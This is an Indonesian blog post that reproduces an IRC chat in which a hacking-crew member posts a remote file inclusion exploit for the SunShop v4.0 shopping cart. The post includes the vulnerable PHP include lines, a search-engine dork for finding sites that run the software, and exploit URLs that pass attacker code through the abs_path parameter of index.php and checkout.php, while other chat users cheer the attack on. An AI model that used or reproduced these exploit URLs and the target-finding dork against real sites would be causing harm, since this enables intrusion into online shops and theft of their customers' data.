Jumat, 21 Maret 2008

Sunshop 4 RFI

<@cah`cupu> Sunshop 4 RFI
[21:31] <@cah`cupu> sunshop 4 (index.php) Remote File Include Vulnerability
[21:31] <@cah`cupu> -----------------------------------------------------------------------------------------
[21:31] <@cah`cupu> # scripts : SunShop v4.0
[21:31] <@cah`cupu> # Discovered By : irvian
[21:31] <@cah`cupu> # scripts site : http://www.turnkeywebtools.com/sunshop/
[21:31] <@cah`cupu> # Thanks To : #hitamputih #nyubicrew #patihack
[21:31] * Joins: zhie_o (~gigi@125.162.53.102)
[21:31] <@cah`cupu> # special To : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz,permenhack
[21:31] <@cah`cupu> # dork : "powered by sunshop"
[21:32] <@cah`cupu> ------------------------------------------------------------------------------------------
[21:32] <@cah`cupu> bug found:
[21:32] <@cah`cupu> index.php
[21:32] <+aRiee> wew
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <+demittegal> wkwkwkwkw
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <@cah`cupu> checkout.php
[21:32] <@cah`cupu> $abs_path = dirname(__FILE__);
[21:32] <@cah`cupu> include $abs_path."/global.php";
[21:32] <+demittegal> hajarrrrrrrrrr
[21:32] <@cah`cupu> Exploit:
[21:32] <@cah`cupu> target.com/index.php?abs_path=[evilcode]
[21:32] <@cah`cupu> target.com/checkout.php?abs_path=[evilcode]

0 Komentar:

Posting Komentar

Berlangganan Posting Komentar [Atom]

<< Beranda